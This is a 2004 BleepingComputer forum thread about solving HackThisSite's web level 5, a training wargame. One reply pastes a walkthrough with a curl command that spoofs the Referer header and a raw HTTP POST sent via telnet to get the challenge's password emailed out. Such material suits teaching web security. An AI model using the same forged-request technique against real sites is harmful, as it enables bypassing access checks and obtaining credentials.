Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

how to set a header cookie?


  • Please log in to reply
4 replies to this topic

#1 unity

unity

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:04 PM

Posted 15 August 2004 - 09:32 PM

curl --referer http://www.hackthissite.org/web/level5/index.php -d to=unity@team-nex.net http://www.hackthissite.org/web/level5/level5.php

You must be logged in to access this page. (Tip: telnet users, send the cookie headers)

i was thinking about doing this instead, but i don't think i'd be able to fake the referer addy, (searched google, found that guy's topic)

<form action="http://www.hackthissite.org/web/level5/level5.php" method="post">
<input type="hidden" name="to" value="unity@team-nex.net">
<input type="submit" value="Send password to Sam">
</form>

etc etc. > needs the referer addy to be http://www.hackthissite.org/web/level5/index.php

BC AdBot (Login to Remove)

 


#2 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,613 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:01:04 PM

Posted 15 August 2004 - 11:48 PM

I am not familiar with that hacking game. What exactly are you trying to accomplish with this level?

#3 HuckerJ

HuckerJ

  • Members
  • 189 posts
  • OFFLINE
  •  
  • Location:East Tennessee
  • Local time:01:04 PM

Posted 16 August 2004 - 08:47 PM

Here's a cheat sheet :thumbsup:
It uses www.hulla-balloo.com instead of www.hackthissite.org, but it's the same challenges.

Level 5: “smokehouse” Level 5
Sam has gotten wise to all the people who wrote their own forms to get the password. Rather
then actually learn the password, he decided to make his email program a little more secure.
This one is insidious. The thing that threw me was the wording above. In
actual fact this problem is almost identical to the last one, except you
need to fake your referrer URL. There are two obvious ways to do this.
The first is to use curl. This makes the problem ridiculously simple. Just
type

“curl --referer http://www.hackthissite.org/web/level5/index.php -d
to=your@emailaddress.com http://www.hackthissite.org/web/level5/level5.php”

into your favourite unix box with curl installed. I don’t have curl installed
on my machine, and if you’re reading this, it’s likely you don’t either, or
don’t know how to use it. So we’ll go for the second method: telnetting to
the webserver!!

This is actually a much more complicated method, since we’ll be talking
HTTP directly to the webserver – the advantage is that it’ll work anywhere
a telnet client is available, which is basically everywhere. I’ll save you the
laborious details of how most of this request was generated (I used the
unix “nc” netcat utility and a dummy form which connected to a special
port), and just give you the data to copy and paste.


POST /hack/level5/level5.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Referer: http://www.www.hackthissite.org/web/level5/index.php
Accept-Language: en-au
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461;
COME.TO/KEWN M8888888S!!!; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: www.hackthissite.org:80
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache
to=your@emailaddress.com


The above needs a little bit of effort to make it work. First, change the
email address to your email address. Next, count the number of
characters (including the three for “to=”) and change the “Content-
Length” variable to that value.
Now, open up a telnet session to www.hackthissite.org on port 80 (this is
achieved by typing “telnet www.hackthissite.org 80” into your command
prompt on whatever operating system you are running)
As soon as it connects (you won’t see any data coming from the server, so
just give it a few seconds and assume its connected) copy and paste your
created request into your telnet session and press enter a few times.
If it worked, it should say somewhere in the returned text that the
password was sent. Something like this, then the connection being lost:


HTTP/1.0 200 OK
Date: Fri, 11 Jul 2003 05:10:06 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) Chili!Soft-ASP/3.6.2 mod_ssl/2.8.4
OpenS
SL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3
mod_perl/1.25
X-Powered-By: PHP/4.1.2
Content-Type: text/html
X-Cache: MISS from bri-pr1.tpgi.com.au
Connection: close
Password reminder successfully sent.


After both these steps, check your email for the password!


Edited by HuckerJ, 16 August 2004 - 08:48 PM.

There are 10 kinds of people. Those who understand binary notation, and those who do not.
Posted Image - It plays, it streams, it kills WiMPs!!

#4 unity

unity
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:04 PM

Posted 17 August 2004 - 07:58 AM

i'm well aware of that guide, but it is old, and the new system has been changed.

#5 raw

raw

    Bleeping Hacker


  • Members
  • 2,577 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Texas
  • Local time:12:04 PM

Posted 25 August 2004 - 04:45 PM

Its been sooooooo long since I did "hackthissite" but I seem to recall using netcat and if it has changed since I was there I would probably have to go back and do it again.
You can send fake referers with nc or telnet for that matter.The example looks similiar to my solution,but I've since deleted all my hacker game notes when all the sites started going away.

My two favorites are
http://quiz.ngsec.com/ <--ngsec is web based

http://www.hackerslab.org/eorg/ <--a real shell with real buffer overflows (I'm on level 15)

I was a huge fan of datafort but it is no more :thumbsup:

http://hackergames.net has a huge list of games.

rawsig.png

 rawcreations.net          @raw_creations


Current systems: WHAT OS, BackTrack-raw, PCLinuxOS, Peppermint OS 6, Kali Linux

and a custom Linux From Scratch server hosting a bunch of top secret stuff.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users